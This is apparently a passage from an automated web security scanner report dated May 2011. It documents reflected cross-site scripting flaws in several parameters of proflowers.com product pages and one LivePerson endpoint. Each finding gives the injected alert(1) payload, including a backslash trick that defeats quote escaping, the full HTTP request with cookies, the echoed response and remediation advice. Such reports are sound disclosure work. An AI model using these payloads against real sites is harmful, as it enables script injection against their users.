Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; RES_TRACKINGID=674723556265235; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; ASP.NET_SessionId=kta3enb3gd0epyjr2evspqf1; MAX_PFC=ContentTrackingViews=ntraccountmanagementbanner1-NFX,NFX; CURRENTSESSION_=IPAddress=173.193.214.243&PageSortProp5=na:na:na:na; ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:16:38 AM; s_cc=true; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_sq=proflodevelopment%3D%2526pid%253DPFC%25253ACategory%25253Aproductgroup%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fproducts.proflowers.com%25252Fflowers%25252FDeluxe-Succulent-Garden-30008396%25253Fviewpos%25253D1%252526trackingpgroup%25253DPBS%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: private,no-cache, no-store
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:16:38 AM?30008396&5/9/2011 5:29:45 AM; domain=.proflowers.com; expires=Sun, 07-Aug-2011 12:29:45 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:29:45 GMT
Content-Length: 138703


<noscript>
<div class="splashBox">
   <p>We...re Sorry - </p>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not have Javascript enabled</b>. Our site requires javascript to bro
...[SNIP]...
3_";
           }
           s.eVar37=cleanString("PFC:Product:30008396_Deluxe Succulent Garden");
           s.eVar51="PBS";
           s.events = "prodView,event5,event22,event23";
           s.products=";30008396;;;event5=1|event22=142874\\";alert(1)//eb3bd423121|event23=0.00";
       }

   </script>
...[SNIP]...

4.188. http://products.proflowers.com/flowers/The-Ultimate-Office-Plant-30003767 [Ref parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://products.proflowers.com
Path:   /flowers/The-Ultimate-Office-Plant-30003767

Issue detail

The value of the Ref request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c82dd\"%3balert(1)//0a10d56d3ce was submitted in the Ref parameter. This input was echoed as c82dd\\";alert(1)//0a10d56d3ce in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, then the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /flowers/The-Ultimate-Office-Plant-30003767?viewpos=6&trackingpgroup=PBS&tile=hmpg_podA&Ref=HomeNoRefc82dd\"%3balert(1)//0a10d56d3ce HTTP/1.1
Host: products.proflowers.com
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; RES_TRACKINGID=674723556265235; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; ASP.NET_SessionId=kta3enb3gd0epyjr2evspqf1; CURRENTSESSION_=IPAddress=173.193.214.243&PageSortProp5=na:na:na:na; ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:10:50 AM; s_cc=true; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_sq=proflodevelopment%3D%2526pid%253DPFC%25253ACategory%25253APBS%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fproducts.proflowers.com%25252Fflowers%25252FThe-Ultimate-Office-Plant-30003767%25253Fviewpos%25253D6%252526trackingpgroup%25253DP%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: private,no-cache, no-store
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:10:50 AM?30003767&5/9/2011 5:27:58 AM; domain=.proflowers.com; expires=Sun, 07-Aug-2011 12:27:58 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:27:57 GMT
Content-Length: 146906


<noscript>
<div class="splashBox">
   <p>We...re Sorry - </p>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not have Javascript enabled</b>. Our site requires javascript to bro
...[SNIP]...
ndarOnZipEntry=ReloadCalendarOnZipEntry_in;this.ShowSummaryZipPanel=ShowSummaryZipPanel_in;};this.Rows = new Array(1);this.Rows[0]=new this.Row("30003767","30003767","30003767","168084","27","HomeNoRefc82dd\\";alert(1)//0a10d56d3ce","","PFC","1",0,"",1,"xpa-1,pxc-1,xpb-1,prh-1,zzd-2,pku-1,phl-2,zze-1,pfl-0,pxa-2,pvo-2,pmt-3,pfb-0,pxb-1,pec-3,mpsmediapersonalitysplit-2,pkt-1,ntd-2,pbo-5,nte-2,pkv-2,ntc-1,ppv-3,apg-1,phr-2,zzf-2,n
...[SNIP]...

4.189. http://products.proflowers.com/flowers/The-Ultimate-Office-Plant-30003767 [tile parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://products.proflowers.com
Path:   /flowers/The-Ultimate-Office-Plant-30003767

Issue detail

The value of the tile request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 221e8\"%3balert(1)//f195e3e5061 was submitted in the tile parameter. This input was echoed as 221e8\\";alert(1)//f195e3e5061 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, then the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /flowers/The-Ultimate-Office-Plant-30003767?viewpos=6&trackingpgroup=PBS&tile=hmpg_podA221e8\"%3balert(1)//f195e3e5061&Ref=HomeNoRef HTTP/1.1
Host: products.proflowers.com
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; RES_TRACKINGID=674723556265235; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; ASP.NET_SessionId=kta3enb3gd0epyjr2evspqf1; CURRENTSESSION_=IPAddress=173.193.214.243&PageSortProp5=na:na:na:na; ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:10:50 AM; s_cc=true; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_sq=proflodevelopment%3D%2526pid%253DPFC%25253ACategory%25253APBS%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fproducts.proflowers.com%25252Fflowers%25252FThe-Ultimate-Office-Plant-30003767%25253Fviewpos%25253D6%252526trackingpgroup%25253DP%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: private,no-cache, no-store
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:10:50 AM?30003767&5/9/2011 5:26:08 AM; domain=.proflowers.com; expires=Sun, 07-Aug-2011 12:26:08 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:26:08 GMT
Content-Length: 146314


<noscript>
<div class="splashBox">
   <p>We...re Sorry - </p>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not have Javascript enabled</b>. Our site requires javascript to bro
...[SNIP]...
_leftpod" || "" == "hmpgB_leftpod" || "" == "hmpg_leftpod" ) {
               s.eVar20="_";
           }
           else if ("" == "ProductSearch" || "" == "ProductSearchFeature") {
               s.eVar20="";
           }
           if ("hmpg_podA221e8\\";alert(1)//f195e3e5061" != "")
           {
               s.eVar20="PFC_hmpg_podA221e8\\";alert(1)//f195e3e5061_";
           }
           s.eVar37=cleanString("PFC:Product:30003767_The Ultimate Office Plant");
           s.eVar51="PBS";
           s.events = "prodVi
...[SNIP]...

4.190. http://products.proflowers.com/flowers/The-Ultimate-Office-Plant-30003767 [trackingpgroup parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://products.proflowers.com
Path:   /flowers/The-Ultimate-Office-Plant-30003767

Issue detail

The value of the trackingpgroup request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 83ea7\"%3balert(1)//17cc815a216 was submitted in the trackingpgroup parameter. This input was echoed as 83ea7\\";alert(1)//17cc815a216 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes; the backslash must be escaped before the quotation mark is, otherwise the quote-escaping step can be undone in exactly the way demonstrated above. Encoding every character outside a safe allowlist as a \uXXXX escape is the more robust option, since it also removes any literal </script> sequence from the output.

Request

GET /flowers/The-Ultimate-Office-Plant-30003767?viewpos=6&trackingpgroup=PBS83ea7\"%3balert(1)//17cc815a216&tile=hmpg_podA&Ref=HomeNoRef HTTP/1.1
Host: products.proflowers.com
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; RES_TRACKINGID=674723556265235; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; ASP.NET_SessionId=kta3enb3gd0epyjr2evspqf1; CURRENTSESSION_=IPAddress=173.193.214.243&PageSortProp5=na:na:na:na; ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:10:50 AM; s_cc=true; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_sq=proflodevelopment%3D%2526pid%253DPFC%25253ACategory%25253APBS%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fproducts.proflowers.com%25252Fflowers%25252FThe-Ultimate-Office-Plant-30003767%25253Fviewpos%25253D6%252526trackingpgroup%25253DP%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: private,no-cache, no-store
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:10:50 AM?30003767&5/9/2011 5:23:30 AM; domain=.proflowers.com; expires=Sun, 07-Aug-2011 12:23:30 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:23:29 GMT
Content-Length: 141553


<noscript>
<div class="splashBox">
   <p>We’re Sorry - </p>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not have Javascript enabled</b>. Our site requires javascript to bro
...[SNIP]...
lant");
           s.prop1 = cleanString("PFC:Product:30003767-TheUltimateOfficePlant");
           if ( "" != "" ) {
               s.prop33 = "captured";
           }
           else {
               s.prop33 = "no zip code";
           }

           if ( "PBS83ea7\\";alert(1)//17cc815a216" == "MerchCartDefault" ) {
                s.eVar6=cleanString("_:30003767_");
           }
           else if ( "PBS83ea7\\";alert(1)//17cc815a216" == "MerchCart" ) {
                s.eVar6=cleanString("_:30003767_");
           }
           
...[SNIP]...

4.191. http://products.proflowers.com/flowers/The-Ultimate-Office-Plant-30003767 [viewpos parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://products.proflowers.com
Path:   /flowers/The-Ultimate-Office-Plant-30003767

Issue detail

The value of the viewpos request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ff98b\"%3balert(1)//1f7c8e9547f was submitted in the viewpos parameter. This input was echoed as ff98b\\";alert(1)//1f7c8e9547f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes; the backslash must be escaped before the quotation mark is, otherwise the quote-escaping step can be undone in exactly the way demonstrated above. Encoding every character outside a safe allowlist as a \uXXXX escape is the more robust option, since it also removes any literal </script> sequence from the output.

Request

GET /flowers/The-Ultimate-Office-Plant-30003767?viewpos=6ff98b\"%3balert(1)//1f7c8e9547f&trackingpgroup=PBS&tile=hmpg_podA&Ref=HomeNoRef HTTP/1.1
Host: products.proflowers.com
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; RES_TRACKINGID=674723556265235; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; ASP.NET_SessionId=kta3enb3gd0epyjr2evspqf1; CURRENTSESSION_=IPAddress=173.193.214.243&PageSortProp5=na:na:na:na; ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:10:50 AM; s_cc=true; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_sq=proflodevelopment%3D%2526pid%253DPFC%25253ACategory%25253APBS%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fproducts.proflowers.com%25252Fflowers%25252FThe-Ultimate-Office-Plant-30003767%25253Fviewpos%25253D6%252526trackingpgroup%25253DP%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: private,no-cache, no-store
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:10:50 AM?30003767&5/9/2011 5:20:39 AM; domain=.proflowers.com; expires=Sun, 07-Aug-2011 12:20:39 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:20:39 GMT
Content-Length: 141634


<noscript>
<div class="splashBox">
   <p>We’re Sorry - </p>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not have Javascript enabled</b>. Our site requires javascript to bro
...[SNIP]...
";
           }
           s.eVar37=cleanString("PFC:Product:30003767_The Ultimate Office Plant");
           s.eVar51="PBS";
           s.events = "prodView,event5,event22,event23";
           s.products=";30003767;;;event5=1|event22=6ff98b\\";alert(1)//1f7c8e9547f|event23=0.00";
       }

   </script>
...[SNIP]...

4.192. http://sales.liveperson.net/hc/87011923/ [msessionkey parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://sales.liveperson.net
Path:   /hc/87011923/

Issue detail

The value of the msessionkey request parameter is copied into the application's response. The payload 6c30f<img%20src%3da%20onerror%3dalert(1)>94c74c754a7 was submitted in the msessionkey parameter. This input was echoed as 6c30f<img src=a onerror=alert(1)>94c74c754a7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary markup into the application's response; the payload uses an img event handler to introduce JavaScript. Note, however, the context the captured response actually shows: the body is served as application/x-javascript, and the echoed value sits inside the single-quoted JavaScript string lpMTagConfig.FPC_SKEY='...' within the js_code member of the lpConnLib.Process({...}) JSONP callback, not between HTML tags. The payload does not terminate that string, so the event handler only fires if the page that loads this script (ww30.1800flowers.com, per the Referer) later writes the FPC_SKEY value into the DOM as HTML; that should be confirmed on the embedding page before the finding is treated as exploitable. A payload containing a single quote or a backslash would be the direct test of whether the JavaScript string itself can be broken out of.

Request

GET /hc/87011923/?&visitor=16601209214853&msessionkey=25522835487083372716c30f<img%20src%3da%20onerror%3dalert(1)>94c74c754a7&siteContainer=STANDALONE&site=87011923&cmd=mTagKnockPage&lpCallId=264594832202-36202526651&protV=20&lpjson=1&id=384168620&javaSupport=true&visitorStatus=INSITE_STATUS HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://ww30.1800flowers.com/product.do?baseCode=91637&dataset=10305&cm_cid=d10305
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LivePersonID=LP i=16601209214853,d=1303177644; _mkto_trk=id:220-ESA-932&token:_mch-liveperson.net-1304643823223-44198

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 01:11:51 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Mon, 09 May 2011 01:11:51 GMT
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 2960

lpConnLib.Process({"ResultSet": {"lpCallId":"264594832202-36202526651","lpCallConfirm":"","lpJS_Execute":[{"code_id": "webServerOverride", "js_code": "if (lpMTagConfig.lpServer != 'sales.liveperson.ne
...[SNIP]...
code_id": "FPCookie", "js_code": "lpMTagConfig.FPC_VID_NAME='87011923-VID'; lpMTagConfig.FPC_VID='16601209214853'; lpMTagConfig.FPC_SKEY_NAME='87011923-SKEY'; lpMTagConfig.FPC_SKEY='25522835487083372716c30f<img src=a onerror=alert(1)>94c74c754a7';lpMTagConfig.FPC_CONT_NAME='HumanClickSiteContainerID_87011923'; lpMTagConfig.FPC_CONT='STANDALONE'"},{"code_id": "SYSTEM!firstpartycookies_compact.js", "js_code": "function lpFirstPartyCookieSupport
...[SNIP]...

4.193. http://www.proflowers.com/house-plants-PBS [tile parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.proflowers.com
Path:   /house-plants-PBS

Issue detail

The value of the tile request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1abf9\"%3balert(1)//e408dc57373 was submitted in the tile parameter. This input was echoed as 1abf9\\";alert(1)//e408dc57373 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes; the backslash must be escaped before the quotation mark is, otherwise the quote-escaping step can be undone in exactly the way demonstrated above. Encoding every character outside a safe allowlist as a \uXXXX escape is the more robust option, since it also removes any literal </script> sequence from the output.

Request

GET /house-plants-PBS?tile=hmpg_podA1abf9\"%3balert(1)//e408dc57373&Ref=HomeNoRef HTTP/1.1
Host: www.proflowers.com
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; ASP.NET_SessionId=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; CURRENTSESSION_=IPAddress=173.193.214.243; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; RES_TRACKINGID=674723556265235; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM; s_cc=true; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_sq=proflodevelopment%3D%2526pid%253DPFC%25253Ahome%25253Ahome%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.proflowers.com%25252Fhouse-plants-PBS%25253Ftile%25253Dhmpg_podA%252526Ref%25253DHomeNoRef%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: CURRENTSESSION_=IPAddress=173.193.214.243&PageSortProp5=na:na:na:na; domain=.proflowers.com; path=/
Set-Cookie: ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:16:38 AM; domain=.proflowers.com; expires=Sun, 07-Aug-2011 12:16:38 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:16:39 GMT
Content-Length: 198580


<noscript>
<div class="splashBox">
   <font style="font-size:16pt;color: #fff786;margin: 10px;">We&rsquo;re Sorry - </font>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not ha
...[SNIP]...
